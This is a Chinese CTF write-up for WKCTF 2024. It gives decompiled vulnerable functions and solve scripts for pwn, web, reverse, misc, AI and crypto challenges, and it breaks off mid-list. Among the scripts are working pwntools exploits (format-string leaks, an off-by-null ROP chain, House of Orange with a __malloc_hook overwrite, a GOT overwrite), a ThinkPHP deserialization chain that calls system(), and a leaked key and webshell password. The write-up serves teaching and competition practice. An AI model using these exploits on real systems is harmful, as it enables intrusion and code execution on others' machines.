题目下载地址:https://github.com/0xviol1t/CTF-challenges/tree/main/2024/WKCTF

PWN

baby_stack

wait中存在格式化字符串漏洞,随便测一下发现输入6的时候会输出一个libc上的地址从而得到基址,通过libc基址获取one gadget地址

/*
 * Decompiler output for the challenge's wait().
 *
 * Reads at most 4 characters, converts them with strtol() (no range check:
 * the result is stored in an unsigned int) and builds a "%<num>$llx"
 * directive from that number. That buffer is then passed to printf() AS THE
 * FORMAT ARGUMENT, so the user picks which printf argument slot gets printed
 * -- the format-string defect the write-up uses to read a libc pointer.
 * Safe form: never pass data as the format; printf("%s", format), or print
 * the number with a constant format string.
 */
void __fastcall wait()
{
    unsigned int num; // eax
    char s[5]; // [rsp+Bh] [rbp-85h] BYREF
    char format[120]; // [rsp+10h] [rbp-80h] BYREF

    puts("Press enter to continue");
    getc(stdin);
    printf("Pick a number: ");
    fgets(s, 5, stdin); // at most 4 characters plus the terminator
    num = strtol(s, 0LL, 10); // negative / out-of-range values are not rejected
    snprintf(format, 0x64uLL, "Your magic number is: %%%d$llx\n", num); // "%%" becomes a literal '%', so the result is a positional directive
    printf(format); // user-controlled format string
    introduce();
}

echo_inner中存在栈上的off-by-null,在栈上布置rop并且通过输入长度控制将\x00写到rbp,返回到上层函数之后就会抬栈运行到布置的rop,为了确保执行到ogg需要将最后8位覆盖成ogg,前面全部覆盖成ret

/*
 * Decompiler output for echo_inner(): reads up to `size` bytes into a1 and
 * writes a NUL at a1[bytes_read]. When fread() returns exactly `size`, that
 * terminator goes to a1[size] -- one byte past the buffer -- which is the
 * off-by-null the write-up uses (per the write-up a1 is a stack buffer of the
 * caller, so the stray 0x00 lands on the saved rbp). fread()'s return value
 * is not checked for errors either, and `size` (int) is converted to size_t
 * with no sign check. Safe form: read at most size - 1 bytes and keep the
 * last byte for the terminator.
 */
void __fastcall echo_inner(_BYTE *a1, int size)
{
    a1[(int)fread(a1, 1uLL, size, stdin)] = 0; // index may equal size: off-by-one NUL write
    puts("You said:");
    printf("%s", a1); // constant format, a1 passed as data: fine
}

exp

# baby_stack solve script (pwntools). Flow, as described in the write-up:
# 1) answer "Pick a number" with 6 so the format-string printf() in wait()
#    prints a libc pointer; 2) subtract that pointer's offset inside libc to
#    get the base and add a one_gadget offset; 3) send a full-length buffer
#    padded with a `ret` gadget and ending in the one_gadget, relying on
#    echo_inner's off-by-null to redirect the caller's return.
# All offsets are specific to the challenge's libc 2.27 build.
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

# Coloured print helpers (orange / red); unused below
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 1  # truthy = remote challenge instance, 0 = local binary (the name is the reverse of what it selects)
if debug:
    r = remote('110.40.35.73', 33688)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.sendafter(b'continue', b'\n')
r.sendlineafter(b'number', b'6')  # "%6$llx": the slot the write-up found to hold a libc pointer

r.recvuntil(b'is: ')
libc_base = int(r.recvuntil(b'\n')[:-1], 16) - 0x3ec7e3  # leaked pointer minus its offset in libc 2.27
libc = ELF('./2.27/libc-2.27.so')

one = [0x4f2a5, 0x4f302, 0x10a2fc]  # one_gadget offsets for libc 2.27
ogg = one[1] + libc_base
ret = 0x00000000000008aa + libc_base  # plain `ret` gadget used as padding

r.sendlineafter(b'256)? ', b'256')  # full length, so echo_inner's terminating NUL lands one past the buffer (per the write-up: on the saved rbp)
p = p64(ret) * 31 + p64(ogg)  # 31 rets + the one_gadget = 256 bytes
r.sendline(p)

r.interactive()

easy_heap

漏洞点出在edit可以堆溢出

/*
 * Decompiler output for edit(). Both `index` and `size` come straight from
 * scanf() and are trusted:
 *   - `index` is never bounds-checked before chunk_ptr[index] is used;
 *   - `size` is only capped at 0x1000 (unsigned compare, so negative values
 *     are rejected too) but never compared with the allocated length of
 *     chunk_ptr[index], so read() can write past the end of the chunk --
 *     the heap overflow the write-up builds on.
 * A correct version validates index against the table and clamps size to
 * the length recorded for that chunk.
 * size[1..2] is the stack-canary slot (the decompiler merged it into the
 * array); it is verified on return.
 */
unsigned __int64 edit()
{
    int index; // [rsp+0h] [rbp-10h] BYREF
    _DWORD size[3]; // [rsp+4h] [rbp-Ch] BYREF

    *(_QWORD *)&size[1] = __readfsqword(0x28u); // stack canary
    index = 0;
    size[0] = 0;
    puts("Index :");
    __isoc99_scanf("%d", &index); // no bounds check on index
    puts("Size :");
    __isoc99_scanf("%d", size);
    if ( size[0] > 0x1000u ) // caps the count, but not against the chunk's real size
    {
        puts("too large");
        exit(0);
    }
    puts("Content :");
    read(0, chunk_ptr[index], size[0]); // can write past the chunk
    return __readfsqword(0x28u) ^ *(_QWORD *)&size[1];
}

没有delete且限制了show的长度为一个地址,首先想到的就是house of orange

伪造top chunk的条件:

  • 保证原本old top chunksize大于MINSIZE
  • 保证原本old top chunkprev_inuse位是1
  • 原本old top chunk的地址加上其size之后的地址要与页对齐 也就是address & 0xfff = 0x000
  • old chunksize要小于申请的堆块大小加上MINSIZE

当申请的堆大小大于伪造的top chunk大小时会将top chunk释放,释放的大小为top chunk size - 0x20,并且根据释放的大小判断进入fastbin或者unsorted bin

所以本题可以先释放一次top chunk到unsorted bin泄露libc,再释放一次top chunk到fastbin进行fastbin attack

exp

# easy_heap solve script (pwntools). Per the write-up there is no free(), so
# the route is House of Orange: overflow the top-chunk size via edit(), have a
# larger malloc() release the old top chunk into the unsorted bin (leak libc
# via show), repeat to get a fastbin-sized freed chunk, then a fastbin attack
# on __malloc_hook. Offsets are specific to the challenge's libc 2.23 build.
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

# Coloured print helpers (orange / red); unused below
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 0  # truthy = remote challenge instance, 0 = local binary
if debug:
    r = remote('110.40.35.73', 33747)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

# Menu wrappers: 1 = add, 2 = edit, 3 = show (prompt strings match the binary's puts() calls)
def add(size, content):
    r.sendlineafter(b'>', b'1')
    r.sendlineafter(b'Size', str(size))
    r.sendafter(b'Content', content)

def edit(index, size, content):
    r.sendlineafter(b'>', b'2')
    r.sendlineafter(b'Index', str(index))
    r.sendlineafter(b'Size', str(size))
    r.sendafter(b'Content', content)

def show(index):
    r.sendlineafter(b'>', b'3')
    r.sendlineafter(b'Index', str(index))

# --- stage 1: forge the top-chunk size, free it into the unsorted bin, leak libc ---
add(0xdf8, b'a')
add(0x18, b'a')

p = b'a' * 0x18 + p64(0x1e1)  # overflow from chunk 1 into the top chunk's size field
edit(1, len(p), p)

add(0xdf8, b'a')  # larger than the forged top: the old top is released
add(0x1b8, b'a')

show(3)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b"\x00")) - 0x3c4b61  # leaked pointer minus its libc 2.23 offset
libc = ELF('./2.23/libc-2.23.so')

one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]  # one_gadget offsets for libc 2.23
ogg = libc_base + one[3]
malloc_hook = libc_base + libc.sym['__malloc_hook']

# --- stage 2: same trick again, this time ending in a fastbin-sized chunk ---
add(0x18, b'a')
p = b'a' * 0x18 + p64(0x1e1)
edit(4, len(p), p)

add(0x148, b'a')
add(0xdf8, b'a')

# --- stage 3: fastbin attack towards __malloc_hook ---
p = b'a' * 0x148 + p64(0x71) + p64(malloc_hook - 0x23)
edit(5, len(p), p)

add(0x68, b'a')
add(0x68, b'a' * 19 + p64(ogg))  # writes the one_gadget address over __malloc_hook

# any further allocation now goes through the hook
r.sendlineafter(b'>', b'1')
r.sendlineafter(b'Size', str(0))

r.interactive()

something_changed

漏洞点是格式化字符串,并且存在后门,限制了输入内容不能包含$,但还是可以直接用fmtstr_payload工具

/*
 * Decompiler output for the challenge's main() (AArch64 build).
 *
 * read() accepts up to 0x50 bytes into v6, which is declared as 40 bytes,
 * and adds no terminator, so strlen()/printf() may run past the buffer. The
 * loop is meant to reject input containing '$', but as decompiled it compares
 * the byte (cast to a pointer) with the ADDRESS of the literal "$", which can
 * never be equal -- if that reflects the source (c == "$" instead of
 * c == '$'), the filter is a no-op; confirm against the disassembly. Either
 * way v6 then reaches printf() as the format argument, which is the
 * format-string defect the write-up exploits (it also notes that pwntools'
 * fmtstr_payload works despite the filter). Safe form: printf("%s", v6) and
 * a bounded, NUL-terminated read.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
    size_t v4; // x19
    int i; // [xsp+FCCh] [xbp+2Ch]
    char v6[40]; // [xsp+FD0h] [xbp+30h] BYREF
    __int64 v7; // [xsp+FF8h] [xbp+58h]

    v7 = _bss_start; // stored, not otherwise used in this listing
    read(0, v6, 0x50uLL); // 0x50 > sizeof v6, and no terminator is added
    for ( i = 0; ; ++i )
    {
        v4 = i;
        if ( v4 >= strlen(v6) )
            break;
        if ( (char *)(unsigned __int8)v6[i] == "$" ) // pointer compared with a string literal: never true
            return 0;
    }
    printf(v6); // user-controlled format string
    return 0;
}

测试出偏移是14,开了canary保护,所以可以将__stack_chk_fail_got改成backdoor

sudo qemu-aarch64 -L ./libc/libc/lib ./pwn        
aaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
aaaaaaaa-0x7f3e313a1400-0x2d70252d70252d70-0xa7025-0x7f3e313a1448-(nil)-0x8080808080-0x2c6f242c6f242c6f-0x7f3e313a13e0-0x7f3e30a48a00-0x400888-0x4008c0-0x7f3e313a13e0-0x4b30a489ac-0x6161616161616161-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70

exp

# something_changed solve script (pwntools; AArch64 target run under qemu-user).
# Per the write-up: format-string offset 14 and a stack canary, so the GOT
# entry of __stack_chk_fail is redirected to the backdoor with fmtstr_payload.
from pwn import *

context(arch='aarch64', os='linux', log_level='debug')

file_name = './pwn'

# Coloured print helpers (orange / red); unused below
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 0  # truthy = remote challenge instance, 0 = local binary under qemu with a gdb stub on port 1234
if debug:
    r = remote('120.79.91.95', 3332)
else:
    r = process(["qemu-aarch64", "-g", "1234", "./pwn"])

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

# {GOT slot: backdoor address}, values taken from the challenge binary per the write-up;
# write_size='short' makes pwntools emit 2-byte writes
p = fmtstr_payload(14, {0x411018:0x400770}, write_size='short')
r.send(p)

r.interactive()

WEB

ez_tp

GET参数s

内网ip地址: 10.40.35.73

<?php
// Generates the payload the write-up passes in the GET parameter `s`:
// minimal stand-ins for ThinkPHP's think\Model and think\model\Pivot whose
// property values are preset so that the application's unserialize() of `s`
// runs the Model gadget chain.
// The application-side root cause is unserialize() on user-supplied input;
// the fix is to never unserialize untrusted data (or at minimum pass
// ['allowed_classes' => false]), not to blocklist this particular chain.
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        // $obj ends up in `table`; the outer object below stores a second Pivot there.
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    // Nest one Pivot in another, serialize, and base64-encode for use in the URL.
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

ez_php

http://110.40.35.73:81/favicon.webp存在AKSK泄露: "ba260cf0-2e6b-4a0e-91c1-d52b8c3214a1"

文件上传拿到webshell密码:shell

蚁剑直连

qiandao

url?file=/flag

MISC

signin

https://github.com/htr-tech/0xTwin/blob/master/twin_cipher.py

解码得到base64编码的图片,图片是一个二维码但是扫不出来,找在线工具https://cli.im/deqr/other得到:**请发送 WKCTF2024 到微信公众号隐雾安全获取flag!**

照做得到flag WKCTF{hello_2024}

不套是你的谎言

DES解密+字典爆破 GPT脚本

from Crypto.Cipher import DES  # 导入DES加密模块

from binascii import a2b_hex # 导入十六进制转字节串的函数

import os, sys # 导入操作系统和系统模块,用于文件操作和系统级交互

# Single-DES decryption helper (ECB mode)
def des_decrypt(data, key):
    """Decrypt `data` with DES-ECB under the 8-byte `key`; returns raw bytes."""
    return DES.new(key, DES.MODE_ECB).decrypt(data)

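# Hex-encoded ciphertext to recover
data_h = '5270263d56386adfaf9c18f360eefe4dd151d9f0dbc51b3e8c2ee5d64be8853d19c6b3c2f014cc6c'
data = a2b_hex(data_h)  # hex text -> raw bytes

# Candidate keys come from password_list.txt in the working directory.
# os.path.join keeps the path portable (the original hard-coded a Windows
# separator) and the `with` block closes the file on every exit path.
with open(os.path.join(os.getcwd(), "password_list.txt"), 'r') as f:
    # splitlines() handles "\n" and "\r\n"; the original split on a literal
    # backslash-n, which never matched a real line break.
    candidates = f.read().splitlines()

# Try each candidate word as a DES key. DES keys are exactly 8 bytes: shorter
# words are NUL-padded, longer ones cannot be keys and are skipped. The key
# being a dictionary word is what makes this search feasible at all.
for word in candidates:
    key = word.encode()
    if len(key) < 8:
        key = key.ljust(8, b'\x00')  # pad with NUL bytes up to the DES key size
    if len(key) != 8:
        continue
    plaintext = des_decrypt(data, key)
    # Crude flag-shape filter: both braces plus a 'c'/'C' somewhere in the output
    if b'{' in plaintext and b'}' in plaintext and (b'C' in plaintext or b'c' in plaintext):
        try:
            # Print the (padded) key and the plaintext when the latter decodes as text
            print(key.decode(), plaintext.decode())
        except UnicodeDecodeError:
            # Not printable: not the flag, keep scanning
            pass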

REVERSE

so_easy

主要函数

/*
 * Decompiler output for the JNI entry point soEasy(env = a1, this = a2, input = a3).
 *
 *  1. Fetches the Java string as a C string through JNIEnv slot 1352/8 == 169
 *     (presumably GetStringUTFChars -- confirm against jni.h) and clears the
 *     scratch area v20/v21.
 *  2. For each 8-byte block of the input (a little-endian 64-bit word on this
 *     x86-64 build) runs 255 rounds of "shift left by one; XOR
 *     0x71234EA7D92996F5 if the top bit was set" (5 rounds unrolled per inner
 *     pass, 51 passes) and stores the result in v20.
 *  3. Compares v20 with unk_560 one 16-bit halfword at a time and counts the
 *     matches in v5 (kept in a byte, so the count wraps at 256).
 *  4. Releases the string through slot 1360/8 == 170 (presumably
 *     ReleaseStringUTFChars) and returns the match count.
 *
 * NOTE(review): both loops are bounded only by strlen(). The block loop reads
 * 8 bytes at a time, so a length that is not a multiple of 8 reads past the
 * terminator; an input longer than the scratch area (v20 + v21, 100 bytes)
 * overflows it on the stack (the canary in v22 would then abort); and the
 * compare loop reads past the 32-byte unk_560 for inputs longer than 32.
 */
__int64 __fastcall Java_com_so_easy_MainActivity_soEasy(__int64 a1, __int64 a2, __int64 a3)
{
    unsigned int v5; // r13d
    const char *v6; // rax
    const char *v7; // r12
    size_t v8; // rax
    size_t v9; // r8
    __int64 v10; // rsi
    int v11; // edx
    __int64 v12; // rdi
    __int64 v13; // rsi
    __int64 v14; // rdi
    __int64 v15; // rcx
    size_t v16; // rax
    size_t v17; // rcx
    unsigned __int8 v18; // di
    __int128 v20[6]; // [rsp+0h] [rbp-98h] BYREF
    int v21; // [rsp+60h] [rbp-38h]
    unsigned __int64 v22; // [rsp+68h] [rbp-30h]

    v22 = __readfsqword(0x28u); // stack canary
    v5 = 0;
    v6 = (const char *)(*(__int64 (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)a1 + 1352LL))(a1, a3, 0LL); // env->GetStringUTFChars(a3, NULL), presumably
    v7 = v6;
    memset(v20, 0, sizeof(v20));
    v21 = 0;
    if ( *v6 )
    {
        v8 = strlen(v6);
        v9 = 0LL;
        do
        {
            v10 = *(_QWORD *)&v7[v9]; // next 8-byte block of the input
            v11 = 255; // 255 rounds in total, five per pass
            do
            {
                v12 = (2 * v10) ^ 0x71234EA7D92996F5LL; // several bit operations on each 8-byte block of the input:
                if ( v10 >= 0 ) // top bit clear -> plain shift, no XOR
                    v12 = 2 * v10;
                v13 = (2 * v12) ^ 0x71234EA7D92996F5LL;
                if ( v12 >= 0 )
                    v13 = 2 * v12;
                v14 = (2 * v13) ^ 0x71234EA7D92996F5LL;
                if ( v13 >= 0 )
                    v14 = 2 * v13;
                v15 = (2 * v14) ^ 0x71234EA7D92996F5LL;
                if ( v14 >= 0 )
                    v15 = 2 * v14;
                v10 = (2 * v15) ^ 0x71234EA7D92996F5LL;
                if ( v15 >= 0 )
                    v10 = 2 * v15;
                v11 -= 5;
            }
            while ( v11 );
            *(_QWORD *)((char *)v20 + v9) = v10; // store the transformed word
            v9 += 8LL;
        }
        while ( v8 > v9 );
    }
    if ( *v7 )
    {
        v16 = strlen(v7);
        v17 = 0LL;
        LOBYTE(v5) = 0;
        do
        {
            v18 = v5 + (*(_WORD *)((char *)v20 + v17) == *(_WORD *)((char *)&unk_560 + v17)); // +1 per matching halfword
            v17 += 2LL;
            v5 = v18;
        }
        while ( v16 > v17 );
    }
    (*(void (__fastcall **)(__int64, __int64, const char *))(*(_QWORD *)a1 + 1360LL))(a1, a3, v7); // env->ReleaseStringUTFChars(a3, v7), presumably
    return v5;
}

多次位分析最后和unk_560比较

// Expected 32-byte table that soEasy() compares, halfword by halfword, with
// the transformed input. Read as four little-endian 64-bit words it is exactly
// the `secret` list in the solve script further down (0x540A95F0C1BA81AE,
// 0xF8844E52E24A0314, 0x09FD988F98143EC9, 0x3FC00F01B405AD5E).
unk_560[] =
{
    0xAE, 0x81, 0xBA, 0xC1, 0xF0, 0x95, 0x0A, 0x54, 0x14, 0x03,
    0x4A, 0xE2, 0x52, 0x4E, 0x84, 0xF8, 0xC9, 0x3E, 0x14, 0x98,
    0x8F, 0x98, 0xFD, 0x09, 0x5E, 0xAD, 0x05, 0xB4, 0x01, 0x0F,
    0xC0, 0x3F
};

exp

# Byte-order reversal helper: prints the hex pairs of a fixed string from
# last to first (little-endian bytes -> the 64-bit constant used below).
def main():
    hexdump = "AE81BAC1F0950A5414"
    size = len(hexdump)
    # Walk the string from its tail, two characters (one byte) at a time;
    # an odd leading nibble is dropped, exactly as the index arithmetic does.
    tail_first = [hexdump[size - 2 * step - 2:size - 2 * step] for step in range(size // 2)]
    print("".join(tail_first))

if __name__ == "__main__":
    main()

# Inverts the 255-round shift/XOR transform from soEasy() on the four expected
# words (unk_560 read as little-endian 64-bit values) to recover the input
# bytes. (The original labelled this a "CRC32 template"; it is the inverse of
# an LFSR-style step, not CRC32.)
secret = [0x540A95F0C1BA81AE,0xF8844E52E24A0314,0x9FD988F98143EC9,0x3FC00F01B405AD5E]
key = 0x71234EA7D92996F5
flag = ""

TOP_BIT = 1 << 63

def _unstep(word):
    """One inverse round of `w <<= 1; if the old top bit was set: w ^= key`.

    `key` is odd, so the low bit of the forward result records whether the
    XOR happened; undo it, shift right, and restore the top bit in that case.
    """
    if word & 1:
        return ((word ^ key) >> 1) | TOP_BIT
    return word >> 1

for word in secret:
    for _ in range(255):
        word = _unstep(word)
    # emit the recovered word low byte first
    flag += "".join(chr((word >> (8 * byte_index)) & 0xFF) for byte_index in range(8))
print(flag)

quite_easy

目测是一个TLS

花指令去掉了

如下

.text:                 nop
.text:00407C83 nop
.text:00407C84 nop
.text:00407C85 nop
.text:00407C86 nop
.text:00407C87 nop
.text:00407C88 nop
.text:00407C89 nop
.text:00407C8A nop
.text:00407C8B nop
.text:00407C8C nop
.text:00407C8D nop
.text:00407C8E nop
.text:00407C8F nop
.text:00407C90 nop
基于rand的一个简单加密
/*
 * Decompiler output for the check routine (after the nop/junk instructions
 * were removed, per the write-up). The container helpers are unnamed
 * (sub_40111D / sub_4013E3 / sub_4010DC / sub_401357 look like string
 * construct / push_back / operator[] / destroy -- presumably; confirm), so
 * the flow below is the write-up's reading rather than a certainty:
 *
 *   srand(len(v21) + 89); key = 16 bytes of rand()          (i loop)
 *   the working string must be 48 bytes                      (exit(99) otherwise)
 *   c[j] = s[j] ^ s[j + 32]   for j in 0..15                 (j loop; key bytes at 32..47)
 *   c[k] = s[k] ^ s[k - 16]   for k in 16..31                (k loop)
 *   s[m] -= a2[m]             for m in 0..31                 (per-position table)
 *   compare the result with Str2.
 *
 * `~(a & b) & (a ^ b)` is just `a ^ b`: wherever a & b has a bit set, a ^ b
 * already has it clear, so the extra mask changes nothing.
 *
 * The seed is a small value (length + 89), so the key space is tiny and the
 * solve script brute-forces it. __CheckForDebuggerJustMyCode suggests an MSVC
 * debug build, i.e. rand() here is the MSVC CRT generator.
 */
int __cdecl sub_40A5A0(char *Str, int a2)
{
    int v2; // eax
    char v3; // al
    char v4; // si
    char v5; // si
    char v6; // di
    _BYTE *v7; // eax
    char v8; // si
    char v9; // si
    char v10; // di
    _BYTE *v11; // eax
    const char *v12; // eax
    _BYTE *v14; // [esp+10h] [ebp-158h]
    int v15; // [esp+18h] [ebp-150h]
    int m; // [esp+E4h] [ebp-84h]
    int k; // [esp+F0h] [ebp-78h]
    int j; // [esp+FCh] [ebp-6Ch]
    int i; // [esp+108h] [ebp-60h]
    char v20[36]; // [esp+114h] [ebp-54h] BYREF
    char v21[32]; // [esp+138h] [ebp-30h] BYREF
    int v22; // [esp+164h] [ebp-4h]

    __CheckForDebuggerJustMyCode(&unk_41A036); // MSVC "Just My Code" hook (debug build)
    sub_40111D(Str); // presumably builds a string from the input
    v22 = 1;
    sub_40111D(&::Str);
    v2 = sub_401663(v21); // presumably the length of v21
    srand(v2 + 89); // tiny seed space
    for ( i = 0; i < 16; ++i )
    {
        v3 = rand();
        sub_4013E3(v3); // append one key byte (presumably push_back)
    }
    if ( sub_401663(v21) != 48 ) // 32 input bytes + 16 key bytes, presumably
        exit(99);
    for ( j = 0; j < 16; ++j )
    {
        v4 = *sub_4010DC(j);
        v5 = *sub_4010DC(j + 32) ^ v4;
        v6 = *sub_4010DC(j);
        v7 = sub_4010DC(j + 32);
        sub_4013E3(~(*v7 & v6) & v5); // == v6 ^ *v7 (see header comment)
    }
    for ( k = 16; k < 32; ++k )
    {
        v8 = *sub_4010DC(k);
        v9 = *sub_4010DC(k - 16) ^ v8;
        v10 = *sub_4010DC(k);
        v11 = sub_4010DC(k - 16);
        sub_4013E3(~(*v11 & v10) & v9); // == v10 ^ *v11
    }
    for ( m = 0; m < 32; ++m )
    {
        v14 = sub_4010DC(m);
        *v14 -= *(m + a2); // subtract the per-position table entry
    }
    sub_401460();
    v12 = sub_4014E7(v20);
    v15 = strcmp(v12, Str2); // final comparison with the expected string
    LOBYTE(v22) = 0;
    sub_401357(v20);
    v22 = -1;
    sub_401357(v21);
    return v15;
}

考点基本就是antidebug动静结合得到加密流程

rand得到key后,前16个与其异或,后16个和前16个异或

exp

#include <stdlib.h> // For srand() and rand()
#include <stdio.h>

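/*
 * Solve script for quite_easy: undoes the transform of sub_40A5A0 (see the
 * decompiled listing above) on the 32 captured bytes in `data`.
 *
 * Reading of the target, per the write-up: key = 16 bytes of rand() after
 * srand(len + 89); c[i] = p[i] ^ key[i] for i < 16; c[i] = p[i] ^ p[i - 16]
 * for 16 <= i < 32; then a per-position table (presumably a2 of sub_40A5A0)
 * is subtracted from every byte. The seed offset is unknown, so every k in
 * 0..254 is tried and a key is accepted when the first recovered byte is
 * 'W' (87), the first letter of the WKCTF{...} flag format.
 *
 * NOTE(review): rand() must come from the same CRT as the challenge binary
 * (the __CheckForDebuggerJustMyCode call suggests an MSVC build); under
 * another libc the key bytes differ and nothing matches -- confirm before
 * re-running. Output keeps the original two-stream shape (first half via
 * "%c", second half via "\n2:%c"), which the write-up says was tidied by hand.
 */
int main(void) {
    /* Per-position table the target subtracts; adding it back undoes that step. */
    static const char sub_table[33] = "flag{ed1d665e6516a37ab09f0b7a40}";
    int data[32] = {0x80, 0xD3, 0x6F, 0xFF, 0x15, 0x03, 0x98, 0x8C, 0xB4, 0x5B,
                    0x96, 0xC0, 0x59, 0xAC, 0x18, 0xDF, 0x2D, 0xCE, 0x3F, 0xFB,
                    0xC4, 0xED, 0xD8, 0xD2, 0xA8, 0x2D, 0xF8, 0x23, 0x9F, 0x22,
                    0x25, 0xCE};
    int key[16];

    /* Loop-invariant: the original re-added the table on every seed attempt. */
    for (int i = 0; i < 32; i++) {
        data[i] += sub_table[i];
    }

    for (int k = 0; k < 255; k++) {
        srand((unsigned)(k + 89));
        for (int i = 0; i < 16; i++) {
            key[i] = rand() & 0xff;
        }
        /* Cheap seed filter: the first plaintext byte must be 'W'. */
        if (((data[0] ^ key[0]) & 0xff) != 'W') {
            continue;
        }
        for (int i = 0; i < 16; i++) {
            int first = (data[i] ^ key[i]) & 0xff;      /* p[i]      */
            int second = (data[i + 16] ^ first) & 0xff; /* p[i + 16] */
            printf("%c", first);
            printf("\n2:%c", second);
        }
    }
    return 0;
}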

然后手动整理一下得到WKCTF{08898c40064d1fc4836db94fe}

AI

how_to_encrypt

问了下gpt得知encrypt的运行结果是ciphertext.txt,其中会用到flagmodel.pth,直接扔给gpt,通过flagmodel.pthflag

import torch
import torch.nn as nn

# Parse ciphertext.txt: one row per line, whitespace-separated floats
def read_ciphertext(file_path):
    """Return the numbers in `file_path` as a 2-D float tensor (one row per line)."""
    with open(file_path, 'r') as handle:
        rows = [[float(token) for token in line.split()] for line in handle]
    return torch.tensor(rows)

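# Model structure: Linear(n -> n*n) followed by a 2x2 convolution with padding 1
class Net(nn.Module):
    """Linear(n, n*n) followed by Conv2d(1, 1, 2x2, stride 1, padding 1).

    `n` is kept on the instance so forward() no longer depends on a
    module-level variable named `n` (the original read a global, which breaks
    when the class is imported elsewhere or the global is rebound after
    construction). The state_dict keys (linear.*, conv.*) are unchanged, so a
    checkpoint saved by the original class still loads.

    Args:
        n: input length; the linear layer widens it to n*n values that are
           viewed as one single-channel n x n image.
    """

    def __init__(self, n):
        super(Net, self).__init__()
        self.n = n  # plain attribute, not a parameter: stays out of state_dict
        self.linear = nn.Linear(n, n * n)
        self.conv = nn.Conv2d(1, 1, (2, 2), stride=1, padding=1)

    def forward(self, x):
        """Map an (n,) or (1, n) input to a (1, 1, n+1, n+1) tensor.

        The 2x2 kernel with padding 1 grows each spatial side by one.
        """
        x = self.linear(x)                 # -> n*n values
        x = x.view(1, 1, self.n, self.n)   # one single-channel n x n "image"
        x = self.conv(x)                   # -> (1, 1, n+1, n+1)
        return x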

# Load ciphertext.txt and model.pth
ciphertext = read_ciphertext('ciphertext.txt')
n = int(ciphertext.shape[-1])  # assumes the last dimension is the side length
ciphertext = ciphertext.view(1, 1, n, n)

# Make n agree with the saved model
# NOTE(review): `n` is reused for two different quantities. Net's 2x2 conv
# with padding 1 outputs (n+1)x(n+1), so the flag length must be one less
# than the ciphertext side length read above; 47 is that value hard-coded
# (presumably the file is 48x48). `n = ciphertext.shape[-1] - 1` would state
# the relation instead of relying on the error message.
n = 47  # set to 47 after a shape-mismatch error

# Build the network
mynet = Net(n)
# NOTE(review): torch.load() unpickles model.pth, which executes whatever the
# checkpoint contains; for a file you did not produce yourself prefer
# torch.load('model.pth', weights_only=True).
mynet.load_state_dict(torch.load('model.pth'))

# The quantity being optimised: a free n-vector, randomly initialised
flag_tensor = torch.randn(n, requires_grad=True, dtype=torch.float32)

# Optimiser over the input only (the optimizer is given no model parameters)
optimizer = torch.optim.Adam([flag_tensor], lr=0.1)

# Target output
target_output = ciphertext

# Gradient descent on the input until the model output matches the ciphertext
for epoch in range(10000):
    optimizer.zero_grad()
    output = mynet(flag_tensor)
    loss = nn.MSELoss()(output, target_output)
    loss.backward()
    optimizer.step()

    if epoch % 1000 == 0:
        print(f'Epoch {epoch}, Loss: {loss.item()}')

# Read back the optimised input
optimized_flag = flag_tensor.detach().numpy()

# Round every component to the nearest code point; components far from an
# integer mean the optimisation did not converge (chr() also rejects negatives)
flag = ''.join([chr(int(round(x))) for x in optimized_flag])
print("Recovered flag:", flag)

CRYPTO

easy_random

先看给的2496个8位,python的随机数用的是mt19937,624个32位就能预测,回溯,8*4=32;2496/4=624。显而易见,可以操作。参考2020 pwnhub CoinFlip2得到state

state = [2922114156, 2886276701, 1168768544, 2339187170, 3551087255, 117510054, 4232565172, 1076139110, 3366831833, 1734453078, 4105913658, 1066792668, 2395352043, 785096749, 3707690263, 2430171307, 2064716469, 1119720065, 1112222395, 2136656989, 2232844740, 388978998, 1363102788, 67899517, 457789137, 3527002829, 1187847099, 1188611575, 3830294635, 3760337941, 297081839, 3230408812, 2906355860, 279725084, 3056220997, 1053068885, 3252084646, 2818726015, 3615795115, 2751222655, 74688614, 1452880497, 426221319, 1680367484, 4211465923, 908441837, 2290937869, 526329269, 3225608663, 350552485, 885538125, 3496826412, 3347875222, 2730243675, 1823616219, 1474037291, 2474670592, 1175091387, 1527449390, 2024565653, 2185945759, 902338428, 3571876882, 632524934, 1235569406, 3612682285, 2727233684, 2085380963, 1570339017, 3839696585, 1482742582, 646051896, 3804319832, 2113555238, 4150326517, 2606046640, 1454130831, 1919843931, 1018624146, 1956310311, 1162868231, 1118548906, 974692065, 3020424226, 2996838388, 1724936385, 1668410782, 3044755338, 3710133971, 1043581839, 362583150, 3880481779, 114234888, 1724135673, 1280834309, 2958310395, 3502226151, 620064160, 